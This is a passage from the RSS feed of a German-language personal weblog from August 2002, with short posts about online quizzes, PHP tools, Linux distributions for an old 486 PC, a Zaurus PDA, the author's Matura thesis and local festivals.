  16192.    <link>https://blog.x-way.org/Misc/2002/08/18/baaa.html</link>
  16193.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=59</guid>
  16194.    <dc:creator>Andreas Jaggi</dc:creator>
  16195.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  16196.    <pubDate>Sun, 18 Aug 2002 14:49:00 +0000</pubDate>
  16197.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  16198.    <description><![CDATA[You are a - Goth Sheep!<br>Black is the new black, don't you know. All you happy people scare me.<br><br><img alt="Goth" src="https://blog.x-way.org/images/goth.jpg"><br><br>Das ist das Ergebniss <a href="https://web.archive.org/web/20020802090115/http://alanna.lacota.net/quiz.html" target="new"><b>dieses Tests</b></a>.<br>Wobei mir nicht ganz klar ist, weshalb ich ein Gothic sein soll, nur weil ich mich schwarz kleide?
  16199. ]]></description>
  16200.    <content:encoded><![CDATA[You are a - Goth Sheep!<br>Black is the new black, don't you know. All you happy people scare me.<br><br><img alt="Goth" src="https://blog.x-way.org/images/goth.jpg"><br><br>Das ist das Ergebniss <a href="https://web.archive.org/web/20020802090115/http://alanna.lacota.net/quiz.html" target="new"><b>dieses Tests</b></a>.<br>Wobei mir nicht ganz klar ist, weshalb ich ein Gothic sein soll, nur weil ich mich schwarz kleide?
  16201. ]]></content:encoded>
  16202.  </item>
  16203.  
  16204.  <item>
  16205.    <title>PHPDoc</title>
  16206.    <link>https://blog.x-way.org/Coding/2002/08/17/PHPDoc.html</link>
  16207.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=58</guid>
  16208.    <dc:creator>Andreas Jaggi</dc:creator>
  16209.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  16210.    <pubDate>Sat, 17 Aug 2002 18:27:00 +0000</pubDate>
  16211.    <category domain="https://blog.x-way.org/Coding">Coding</category>
  16212.    <description><![CDATA[<a href="http://www.devshed.com/Server_Side/PHP/SelfDoc/page1.html" target="_blank"><b>Diesen Artikel</b></a> über PHPDoc muss ich mir merken. Könnte nützlich sei für meine Maturaarbeit.
  16213. ]]></description>
  16214.    <content:encoded><![CDATA[<a href="http://www.devshed.com/Server_Side/PHP/SelfDoc/page1.html" target="_blank"><b>Diesen Artikel</b></a> über PHPDoc muss ich mir merken. Könnte nützlich sei für meine Maturaarbeit.
  16215. ]]></content:encoded>
  16216.  </item>
  16217.  
  16218.  <item>
  16219.    <title>PHP-GTK</title>
  16220.    <link>https://blog.x-way.org/Coding/2002/08/17/PHP-GTK.html</link>
  16221.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=57</guid>
  16222.    <dc:creator>Andreas Jaggi</dc:creator>
  16223.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  16224.    <pubDate>Sat, 17 Aug 2002 03:28:00 +0000</pubDate>
  16225.    <category domain="https://blog.x-way.org/Coding">Coding</category>
  16226.    <description><![CDATA[Nachdem ich nun schon vielerorts von PHP-GTK gelesen habe, habe ich nun dieses <a href="http://gtk.php.net/" target="_blank"><b>graphische Zeugs</b></a> installiert.<br>(Mit Hilfe <a href="https://web.archive.org/web/20021018115456/http://zend.com/zend/tut/tutorial-silva.php" target="_blank"><b>dieses</b></a> Tutorials war es gar nicht schwer :-)<br><br>Bis jetzt funktionierts IMHO gut. Nun muss ich sehen, wie ich mit der GUI-Programmierung zurechtkommen kann ;-)
  16227. ]]></description>
  16228.    <content:encoded><![CDATA[Nachdem ich nun schon vielerorts von PHP-GTK gelesen habe, habe ich nun dieses <a href="http://gtk.php.net/" target="_blank"><b>graphische Zeugs</b></a> installiert.<br>(Mit Hilfe <a href="https://web.archive.org/web/20021018115456/http://zend.com/zend/tut/tutorial-silva.php" target="_blank"><b>dieses</b></a> Tutorials war es gar nicht schwer :-)<br><br>Bis jetzt funktionierts IMHO gut. Nun muss ich sehen, wie ich mit der GUI-Programmierung zurechtkommen kann ;-)
  16229. ]]></content:encoded>
  16230.  </item>
  16231.  
  16232.  <item>
  16233.    <title>Zaurus</title>
  16234.    <link>https://blog.x-way.org/Linux/2002/08/14/Zaurus.html</link>
  16235.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=56</guid>
  16236.    <dc:creator>Andreas Jaggi</dc:creator>
  16237.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  16238.    <pubDate>Wed, 14 Aug 2002 23:05:00 +0000</pubDate>
  16239.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  16240.    <description><![CDATA[<br><img src="https://blog.x-way.org/images/zaurus.jpeg" width="128" height="188" style="border: 1px solid #000000;" alt="Sharp Zaurus"><br><br>Am liebsten hätte ich so einen <a href="https://web.archive.org/web/20021020000810/http://www.zaurus.de/www_index?m=" target="_blank"><b>Sharp Zaurus.</b></a> IMHO eindlich ein brauchbarer PDA, denn ohne eine Tastatur - nur mit Kritzelzeichen - wirkten die bisherigen PDAs auf mich wie Kinderspielzeug.<br>Und : <b>ER LÄUFT MIT LINUX!</b><br>Doch der kostet 1099.- CHF (=1099/3*2 EURO).<br>Und deshalb siehts bei mir nur <a href="https://blog.x-way.org/images/14082002235237.jpg"><b>so</b></a> aus.
  16241. ]]></description>
  16242.    <content:encoded><![CDATA[<br><img src="https://blog.x-way.org/images/zaurus.jpeg" width="128" height="188" style="border: 1px solid #000000;" alt="Sharp Zaurus"><br><br>Am liebsten hätte ich so einen <a href="https://web.archive.org/web/20021020000810/http://www.zaurus.de/www_index?m=" target="_blank"><b>Sharp Zaurus.</b></a> IMHO eindlich ein brauchbarer PDA, denn ohne eine Tastatur - nur mit Kritzelzeichen - wirkten die bisherigen PDAs auf mich wie Kinderspielzeug.<br>Und : <b>ER LÄUFT MIT LINUX!</b><br>Doch der kostet 1099.- CHF (=1099/3*2 EURO).<br>Und deshalb siehts bei mir nur <a href="https://blog.x-way.org/images/14082002235237.jpg"><b>so</b></a> aus.
  16243. ]]></content:encoded>
  16244.  </item>
  16245.  
  16246.  <item>
  16247.    <title>Maturaarbeit</title>
  16248.    <link>https://blog.x-way.org/School/2002/08/13/Maturaarbeit.html</link>
  16249.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=55</guid>
  16250.    <dc:creator>Andreas Jaggi</dc:creator>
  16251.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  16252.    <pubDate>Tue, 13 Aug 2002 22:24:00 +0000</pubDate>
  16253.    <category domain="https://blog.x-way.org/School">School</category>
  16254.    <description><![CDATA[<a href="https://web.archive.org/web/20021003133006/https://www.heise.de/ix/artikel/2000/12/098/" target="_blank"><b>Diesen Artikel</b></a> könnte ich vielleicht noch in meine Maturaarbeit einbauen.<br><br>Herzlichen Dank an <a href="http://www.mytzwaen.de/" target="_blank"><b>tzwaen</b></a>
  16255. ]]></description>
  16256.    <content:encoded><![CDATA[<a href="https://web.archive.org/web/20021003133006/https://www.heise.de/ix/artikel/2000/12/098/" target="_blank"><b>Diesen Artikel</b></a> könnte ich vielleicht noch in meine Maturaarbeit einbauen.<br><br>Herzlichen Dank an <a href="http://www.mytzwaen.de/" target="_blank"><b>tzwaen</b></a>
  16257. ]]></content:encoded>
  16258.  </item>
  16259.  
  16260.  <item>
  16261.    <title>Barcode</title>
  16262.    <link>https://blog.x-way.org/Misc/2002/08/13/Barcode.html</link>
  16263.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=54</guid>
  16264.    <dc:creator>Andreas Jaggi</dc:creator>
  16265.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  16266.    <pubDate>Tue, 13 Aug 2002 14:09:00 +0000</pubDate>
  16267.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  16268.    <description><![CDATA[<br><img alt="Barcode für http://waterwave.ch/weblog" src="https://blog.x-way.org/images/barcode.jpg" width="400" height="50"><br><br><a href="http://www.mywebwork.de/fiene.tv/" target="_blank"><b>Hier</b></a> habe ich den <a href="http://www.barcodesinc.com/generator/index.php" target="_blank"><b>Barcode-Generator</b></a> gefunden.
  16269. ]]></description>
  16270.    <content:encoded><![CDATA[<br><img alt="Barcode für http://waterwave.ch/weblog" src="https://blog.x-way.org/images/barcode.jpg" width="400" height="50"><br><br><a href="http://www.mywebwork.de/fiene.tv/" target="_blank"><b>Hier</b></a> habe ich den <a href="http://www.barcodesinc.com/generator/index.php" target="_blank"><b>Barcode-Generator</b></a> gefunden.
  16271. ]]></content:encoded>
  16272.  </item>
  16273.  
  16274.  <item>
  16275.    <title>School is cool!</title>
  16276.    <link>https://blog.x-way.org/School/2002/08/11/School_is_cool.html</link>
  16277.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=53</guid>
  16278.    <dc:creator>Andreas Jaggi</dc:creator>
  16279.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  16280.    <pubDate>Sun, 11 Aug 2002 16:25:00 +0000</pubDate>
  16281.    <category domain="https://blog.x-way.org/School">School</category>
  16282.    <description><![CDATA[Aus aktuellem Anlass habe ich mich entschlossen noch eine weitere Kategorie zu erstellen.<br>Die <a href="http://waterwave.ch/weblog/index.php?cat=7"><b>Kategorie Ausbildung</b></a>.<br>Hier schreibe ich über so uninteressante Dinge wie meine morgige Geo-Maturprüfung.<br><a href="#" class="gone"><b>Link dazu.</b></a>
  16283. ]]></description>
  16284.    <content:encoded><![CDATA[Aus aktuellem Anlass habe ich mich entschlossen noch eine weitere Kategorie zu erstellen.<br>Die <a href="http://waterwave.ch/weblog/index.php?cat=7"><b>Kategorie Ausbildung</b></a>.<br>Hier schreibe ich über so uninteressante Dinge wie meine morgige Geo-Maturprüfung.<br><a href="#" class="gone"><b>Link dazu.</b></a>
  16285. ]]></content:encoded>
  16286.  </item>
  16287.  
  16288.  <item>
  16289.    <title>ISO-Shop</title>
  16290.    <link>https://blog.x-way.org/Linux/2002/08/11/ISO-Shop.html</link>
  16291.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=52</guid>
  16292.    <dc:creator>Andreas Jaggi</dc:creator>
  16293.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  16294.    <pubDate>Sun, 11 Aug 2002 00:26:00 +0000</pubDate>
  16295.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  16296.    <description><![CDATA[<br><table style="width: 100%; border: 0"><tr><td><img src="https://blog.x-way.org/images/linux.gif" width="60" height="70" alt="Tux"></td><td>  </td><td>Beim nächsten (grösseren) Distributions wechsel, werde ich nicht mehr mühsam selbst herunterladen sondern <a href="https://web.archive.org/web/20020602075209/http://www.cynox.ch/isoshop/" target="_blank"><b>hier</b></a> eine fertige CD bestellen.<br>Dabei muss ich mir unbedingt dieses "Kreditkarten-Debian" zulegen ;-)</td></tr></table>
  16297. ]]></description>
  16298.    <content:encoded><![CDATA[<br><table style="width: 100%; border: 0"><tr><td><img src="https://blog.x-way.org/images/linux.gif" width="60" height="70" alt="Tux"></td><td>  </td><td>Beim nächsten (grösseren) Distributions wechsel, werde ich nicht mehr mühsam selbst herunterladen sondern <a href="https://web.archive.org/web/20020602075209/http://www.cynox.ch/isoshop/" target="_blank"><b>hier</b></a> eine fertige CD bestellen.<br>Dabei muss ich mir unbedingt dieses "Kreditkarten-Debian" zulegen ;-)</td></tr></table>
  16299. ]]></content:encoded>
  16300.  </item>
  16301.  
  16302.  <item>
  16303.    <title>Nerina Pallot</title>
  16304.    <link>https://blog.x-way.org/Music/2002/08/10/Nerina_Pallot.html</link>
  16305.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=51</guid>
  16306.    <dc:creator>Andreas Jaggi</dc:creator>
  16307.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  16308.    <pubDate>Sat, 10 Aug 2002 19:33:00 +0000</pubDate>
  16309.    <category domain="https://blog.x-way.org/Music">Music</category>
  16310.    <description><![CDATA[Seit ich den Song <a href="#" target="_blank" class="gone"><b>Patience</b></a> von <a href="https://web.archive.org/web/20021214000000/http://www.nerinapallot.co.uk/" target="_blank"><b>Nerina Pallot</b></a> im <a href="https://web.archive.org/web/20020802102556/http://www.radiofreevirgin.com/" target="_blank"><b>Webradio</b></a> gehört habe, kann ich nicht mehr ohne ;-)
  16311. ]]></description>
  16312.    <content:encoded><![CDATA[Seit ich den Song <a href="#" target="_blank" class="gone"><b>Patience</b></a> von <a href="https://web.archive.org/web/20021214000000/http://www.nerinapallot.co.uk/" target="_blank"><b>Nerina Pallot</b></a> im <a href="https://web.archive.org/web/20020802102556/http://www.radiofreevirgin.com/" target="_blank"><b>Webradio</b></a> gehört habe, kann ich nicht mehr ohne ;-)
  16313. ]]></content:encoded>
  16314.  </item>
  16315.  
  16316.  <item>
  16317.    <title>index.php?cat=5</title>
  16318.    <link>https://blog.x-way.org/Networking/2002/08/10/indexphpcat5.html</link>
  16319.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=50</guid>
  16320.    <dc:creator>Andreas Jaggi</dc:creator>
  16321.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  16322.    <pubDate>Sat, 10 Aug 2002 18:08:00 +0000</pubDate>
  16323.    <category domain="https://blog.x-way.org/Networking">Networking</category>
  16324.    <description><![CDATA[Als ich die <a href="http://waterwave.ch/weblog/index.php?cat=6"><b>Kategorie Linux</b></a> einfügte, sah ich, dass bei ihrem Aufruf "...index.php?cat=5" erscheint. Als mehr oder weniger geübter LAN-Bastler assoziere ich "cat 5" aber mit Netzwerk und nicht mit Linux. So musste dann noch schnell die <a href="http://waterwave.ch/weblog/index.php?cat=5"><b>Kategorie Networking</b></a> entstehen und <a href="http://waterwave.ch/weblog/index.php?cat=6">Linux</a> wurde eine Stufe weitergeschoben. Dies interessiert vermutlich niemanden; aber es erklärt warum bis jetzt eine leere Seite erschien wenn man "...?cat=5" eingab. Nun ist dies das erste Posting in dieser Kategorie und es werden noch weitere folgen (vermutlich nicht allzu häufig ;-)
  16325. ]]></description>
  16326.    <content:encoded><![CDATA[Als ich die <a href="http://waterwave.ch/weblog/index.php?cat=6"><b>Kategorie Linux</b></a> einfügte, sah ich, dass bei ihrem Aufruf "...index.php?cat=5" erscheint. Als mehr oder weniger geübter LAN-Bastler assoziere ich "cat 5" aber mit Netzwerk und nicht mit Linux. So musste dann noch schnell die <a href="http://waterwave.ch/weblog/index.php?cat=5"><b>Kategorie Networking</b></a> entstehen und <a href="http://waterwave.ch/weblog/index.php?cat=6">Linux</a> wurde eine Stufe weitergeschoben. Dies interessiert vermutlich niemanden; aber es erklärt warum bis jetzt eine leere Seite erschien wenn man "...?cat=5" eingab. Nun ist dies das erste Posting in dieser Kategorie und es werden noch weitere folgen (vermutlich nicht allzu häufig ;-)
  16327. ]]></content:encoded>
  16328.  </item>
  16329.  
  16330.  <item>
  16331.    <title>Neue Kategorie</title>
  16332.    <link>https://blog.x-way.org/Linux/2002/08/10/Neue_Kategorie.html</link>
  16333.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=49</guid>
  16334.    <dc:creator>Andreas Jaggi</dc:creator>
  16335.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  16336.    <pubDate>Sat, 10 Aug 2002 02:49:00 +0000</pubDate>
  16337.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  16338.    <description><![CDATA[Ab jetzt kann man all den Stuss, welchen ich in der letzten Zeit über Linux geschrieben habe (schreiben werde), in der <a href="http://waterwave.ch/weblog/index.php?cat=6" target="_self"><b>Kategorie Linux</b></a> finden.
  16339. ]]></description>
  16340.    <content:encoded><![CDATA[Ab jetzt kann man all den Stuss, welchen ich in der letzten Zeit über Linux geschrieben habe (schreiben werde), in der <a href="http://waterwave.ch/weblog/index.php?cat=6" target="_self"><b>Kategorie Linux</b></a> finden.
  16341. ]]></content:encoded>
  16342.  </item>
  16343.  
  16344.  <item>
  16345.    <title>Gujin: Linux boot loader</title>
  16346.    <link>https://blog.x-way.org/Linux/2002/08/08/Gujin_Linux_boot_loader.html</link>
  16347.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=48</guid>
  16348.    <dc:creator>Andreas Jaggi</dc:creator>
  16349.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  16350.    <pubDate>Thu, 08 Aug 2002 13:40:00 +0000</pubDate>
  16351.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  16352.    <description><![CDATA[Nachdem der 486er nach der 4. Installation Linux noch immer nicht aufstarten wollte, habe ich <a href="http://sourceforge.net/projects/gujin/" target="_blank"><b>diesen</b></a> Boot Loader gefunden. Und siehe da, es funktioniert.<br>BTW: Nachdem Knoppix und ICEpack-Linux und Turbolinux sich nicht installieren liessen, habe ich dei Press-Edition von Redhat 7.3 draufgetan.
  16353. ]]></description>
  16354.    <content:encoded><![CDATA[Nachdem der 486er nach der 4. Installation Linux noch immer nicht aufstarten wollte, habe ich <a href="http://sourceforge.net/projects/gujin/" target="_blank"><b>diesen</b></a> Boot Loader gefunden. Und siehe da, es funktioniert.<br>BTW: Nachdem Knoppix und ICEpack-Linux und Turbolinux sich nicht installieren liessen, habe ich dei Press-Edition von Redhat 7.3 draufgetan.
  16355. ]]></content:encoded>
  16356.  </item>
  16357.  
  16358.  <item>
  16359.    <title>ROOT Linux</title>
  16360.    <link>https://blog.x-way.org/Linux/2002/08/06/ROOT_Linux.html</link>
  16361.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=47</guid>
  16362.    <dc:creator>Andreas Jaggi</dc:creator>
  16363.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  16364.    <pubDate>Tue, 06 Aug 2002 21:28:00 +0000</pubDate>
  16365.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  16366.    <description><![CDATA[Zu den potentiellen Kandidaten für den 486er hat sich noch eine weitere Distribution gesellt:<br><br><a href="http://www.rootlinux.org" target="_blank"><img src="https://blog.x-way.org/images/rootlinux.jpg" width="88" height="31" alt="ROOT Linux"></a><br><br>Aber zuerst wird jetzt das ISO-Image von Knoppix fertig herunterge<span style="text-decoration: line-through;">saugt</span>laden.
  16367. ]]></description>
  16368.    <content:encoded><![CDATA[Zu den potentiellen Kandidaten für den 486er hat sich noch eine weitere Distribution gesellt:<br><br><a href="http://www.rootlinux.org" target="_blank"><img src="https://blog.x-way.org/images/rootlinux.jpg" width="88" height="31" alt="ROOT Linux"></a><br><br>Aber zuerst wird jetzt das ISO-Image von Knoppix fertig herunterge<span style="text-decoration: line-through;">saugt</span>laden.
  16369. ]]></content:encoded>
  16370.  </item>
  16371.  
  16372.  <item>
  16373.    <title>Knoppix, Phat Linux und SUSE Liveeval</title>
  16374.    <link>https://blog.x-way.org/Linux/2002/08/06/Knoppix_Phat_Linux_und_SUSE_Liveeval.html</link>
  16375.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=46</guid>
  16376.    <dc:creator>Andreas Jaggi</dc:creator>
  16377.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  16378.    <pubDate>Tue, 06 Aug 2002 19:13:00 +0000</pubDate>
  16379.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  16380.    <description><![CDATA[Irgendeine dieser Distributionen werde ich benutzen um einem alten 486er Leben einzuhauchen. ;-)<br><br><a href="http://www.knopper.net/knoppix/" target="_blank"><b>Knoppix</b></a> - gefunden via <a href="https://web.archive.org/web/20020810145549/http://flashback.gantenbein.ws/entry.php?id=00024" target="_blank"><b>andi</b></a><br><a href="https://web.archive.org/web/20020923080402/http://www.phatlinux.com/" target="_blank"><b>Phat Linux</b></a><br><a href="http://www.suse.de/" target="_blank"><b>SUSE Liveeval</b></a>
  16381. ]]></description>
  16382.    <content:encoded><![CDATA[Irgendeine dieser Distributionen werde ich benutzen um einem alten 486er Leben einzuhauchen. ;-)<br><br><a href="http://www.knopper.net/knoppix/" target="_blank"><b>Knoppix</b></a> - gefunden via <a href="https://web.archive.org/web/20020810145549/http://flashback.gantenbein.ws/entry.php?id=00024" target="_blank"><b>andi</b></a><br><a href="https://web.archive.org/web/20020923080402/http://www.phatlinux.com/" target="_blank"><b>Phat Linux</b></a><br><a href="http://www.suse.de/" target="_blank"><b>SUSE Liveeval</b></a>
  16383. ]]></content:encoded>
  16384.  </item>
  16385.  
  16386.  <item>
  16387.    <title>Weblog Bruder</title>
  16388.    <link>https://blog.x-way.org/Misc/2002/08/06/Weblog_Bruder.html</link>
  16389.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=45</guid>
  16390.    <dc:creator>Andreas Jaggi</dc:creator>
  16391.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  16392.    <pubDate>Tue, 06 Aug 2002 18:40:00 +0000</pubDate>
  16393.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  16394.    <description><![CDATA[<br><a href="https://web.archive.org/web/20070403124927/http://flashback.gantenbein.ws/" target="_blank"><img src="http://andreas.gantenbein.ws/logo_button.gif" width="88" height="31" alt="http://andreas.gantenbein.ws" style="border: 1px solid #cccccc;"></a><br><br>Wie ich <a href="http://waterwave.ch/weblog/detail.php?id=39" target="_blank"><b>hier</b></a> feststelle, habe ich <a href="https://web.archive.org/web/20030925212731/http://www.blogtree.com/blogtree.php?blogid=1265" target="_blank"><b>hier</b></a> einen Weblog Bruder bekommen. :-)
  16395. ]]></description>
  16396.    <content:encoded><![CDATA[<br><a href="https://web.archive.org/web/20070403124927/http://flashback.gantenbein.ws/" target="_blank"><img src="http://andreas.gantenbein.ws/logo_button.gif" width="88" height="31" alt="http://andreas.gantenbein.ws" style="border: 1px solid #cccccc;"></a><br><br>Wie ich <a href="http://waterwave.ch/weblog/detail.php?id=39" target="_blank"><b>hier</b></a> feststelle, habe ich <a href="https://web.archive.org/web/20030925212731/http://www.blogtree.com/blogtree.php?blogid=1265" target="_blank"><b>hier</b></a> einen Weblog Bruder bekommen. :-)
  16397. ]]></content:encoded>
  16398.  </item>
  16399.  
  16400.  <item>
  16401.    <title>Damians World</title>
  16402.    <link>https://blog.x-way.org/Linux/2002/08/06/Damians_World.html</link>
  16403.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=44</guid>
  16404.    <dc:creator>Andreas Jaggi</dc:creator>
  16405.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  16406.    <pubDate>Tue, 06 Aug 2002 18:16:00 +0000</pubDate>
  16407.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  16408.    <description><![CDATA[<a href="https://web.archive.org/web/20020725162207/http://damian.behave.ch/" target="_blank"><b>damian.behave.ch</b></a> ist die Webseite eines Informatikstudenten.<br>Besitzt umfangreiche und qualitativ hochstehende Linksammlung. Insbesondere zu den Themen Linux und Apple.
  16409. ]]></description>
  16410.    <content:encoded><![CDATA[<a href="https://web.archive.org/web/20020725162207/http://damian.behave.ch/" target="_blank"><b>damian.behave.ch</b></a> ist die Webseite eines Informatikstudenten.<br>Besitzt umfangreiche und qualitativ hochstehende Linksammlung. Insbesondere zu den Themen Linux und Apple.
  16411. ]]></content:encoded>
  16412.  </item>
  16413.  
  16414.  <item>
  16415.    <title>What Tree Did You Fall From?</title>
  16416.    <link>https://blog.x-way.org/Misc/2002/08/05/What_Tree_Did_You_Fall_From.html</link>
  16417.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=43</guid>
  16418.    <dc:creator>Andreas Jaggi</dc:creator>
  16419.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  16420.    <pubDate>Mon, 05 Aug 2002 17:18:00 +0000</pubDate>
  16421.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  16422.    <description><![CDATA[Der <a href="https://web.archive.org/web/20020808170007/http://www.salpar.net/tree.html" target="_blank"><b>keltischen Astrologie</b></a> entsprechend bin ich von diesem Baum gefallen:<br><i>ELM TREE (Noble-Minded) - pleasant shape, tasteful clothes, loudest demands, tends not to forgive mistakes, cheerful, likes to lead but not to obey, honest and faithful partner, likes making decisions for others, noble-minded, generous, good sense of humor, practical.</i><br><br>Obwohl ich mich eher dem FIR TREE zugeordnet hätte.<br><br>Via <a href="http://www.x-ploration.de/" target="_blank"><b>generation NeXt</b></a>
  16423. ]]></description>
  16424.    <content:encoded><![CDATA[Der <a href="https://web.archive.org/web/20020808170007/http://www.salpar.net/tree.html" target="_blank"><b>keltischen Astrologie</b></a> entsprechend bin ich von diesem Baum gefallen:<br><i>ELM TREE (Noble-Minded) - pleasant shape, tasteful clothes, loudest demands, tends not to forgive mistakes, cheerful, likes to lead but not to obey, honest and faithful partner, likes making decisions for others, noble-minded, generous, good sense of humor, practical.</i><br><br>Obwohl ich mich eher dem FIR TREE zugeordnet hätte.<br><br>Via <a href="http://www.x-ploration.de/" target="_blank"><b>generation NeXt</b></a>
  16425. ]]></content:encoded>
  16426.  </item>
  16427.  
  16428.  <item>
  16429.    <title>Hilfe, ich bin besessen!</title>
  16430.    <link>https://blog.x-way.org/Misc/2002/08/05/Hilfe_ich_bin_besessen.html</link>
  16431.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=42</guid>
  16432.    <dc:creator>Andreas Jaggi</dc:creator>
  16433.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  16434.    <pubDate>Mon, 05 Aug 2002 17:03:00 +0000</pubDate>
  16435.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  16436.    <description><![CDATA[<br><div style="width: 100%; text-align: center"><table style="margin-left: auto; margin-right: auto; border: 2px solid #003060; height: 15px; width: 320px; background-color: #003060; border-spacing: 0;"><tr><td style="width: 200px; background-color: #FF6800; text-align: center; font-family: 'ocr a extended', monospace; color: #000000;">62.5 %</td><td style="background-color: #003060"></td></tr></table><br>My weblog owns 62.5 % of me.<br><a href="https://web.archive.org/web/20020914121801/http://wannabegirl.org/quiz/owned/">Does your weblog own you?</a></div>
  16437. ]]></description>
  16438.    <content:encoded><![CDATA[<br><div style="width: 100%; text-align: center"><table style="margin-left: auto; margin-right: auto; border: 2px solid #003060; height: 15px; width: 320px; background-color: #003060; border-spacing: 0;"><tr><td style="width: 200px; background-color: #FF6800; text-align: center; font-family: 'ocr a extended', monospace; color: #000000;">62.5 %</td><td style="background-color: #003060"></td></tr></table><br>My weblog owns 62.5 % of me.<br><a href="https://web.archive.org/web/20020914121801/http://wannabegirl.org/quiz/owned/">Does your weblog own you?</a></div>
  16439. ]]></content:encoded>
  16440.  </item>
  16441.  
  16442.  <item>
  16443.    <title>Festerei</title>
  16444.    <link>https://blog.x-way.org/Misc/2002/08/05/Festerei.html</link>
  16445.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=41</guid>
  16446.    <dc:creator>Andreas Jaggi</dc:creator>
  16447.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  16448.    <pubDate>Mon, 05 Aug 2002 16:55:00 +0000</pubDate>
  16449.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  16450.    <description><![CDATA[Am 1. August war ich <a href="http://www.brienzerseerockfestival.ch" target="_blank"><b>da</b></a> und am 2. und 3. August <span style="text-decoration: line-through;">musste</span>durfte ich beim Sommerfest in <a href="http://www.zweisimmen.ch" target="_blank"><b>Zweisimmen</b></a> helfen (jetzt bin ich Weltmeister im Abwaschen) und bis am frühen Morgen (ca. 5 Uhr) in der Bar herum<span style="text-decoration: line-through;">saufen</span>hängen.
  16451. ]]></description>
  16452.    <content:encoded><![CDATA[Am 1. August war ich <a href="http://www.brienzerseerockfestival.ch" target="_blank"><b>da</b></a> und am 2. und 3. August <span style="text-decoration: line-through;">musste</span>durfte ich beim Sommerfest in <a href="http://www.zweisimmen.ch" target="_blank"><b>Zweisimmen</b></a> helfen (jetzt bin ich Weltmeister im Abwaschen) und bis am frühen Morgen (ca. 5 Uhr) in der Bar herum<span style="text-decoration: line-through;">saufen</span>hängen.
  16453. ]]></content:encoded>
  16454.  </item>
  16455.  
  16456.  <item>
  16457.    <title>Portrait</title>
  16458.    <link>https://blog.x-way.org/Misc/2002/08/05/Portrait.html</link>
  16459.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=40</guid>
  16460.    <dc:creator>Andreas Jaggi</dc:creator>
  16461.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  16462.    <pubDate>Mon, 05 Aug 2002 16:43:00 +0000</pubDate>
  16463.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  16464.    <description><![CDATA[<table style="border: 0; width: 100%"><tr><td style="width: 84px"><img src="https://blog.x-way.org/images/avatar.gif" alt="Avatar" height="125" width="65"></td><td>Bei <a href="http://www.avatomatic.de/" target="_blank"><b>avatomatic.de</b></a> gibt es eine weitere "Personendarstellungsmaschine". So kommt zu <a href="http://waterwave.ch/weblog/detail.php?id=16">den</a> <a href="http://waterwave.ch/weblog/about.php">schon</a> <a href="http://waterwave.ch/weblog/detail.php?id=25">vorhandenen</a> noch ein weiteres Selbstbildnis dazu.<br>Gefunden bei <a href="http://www.mytzwaen.de/" target="_blank"><b>tzwaen</b></a></td></tr></table>
  16465. ]]></description>
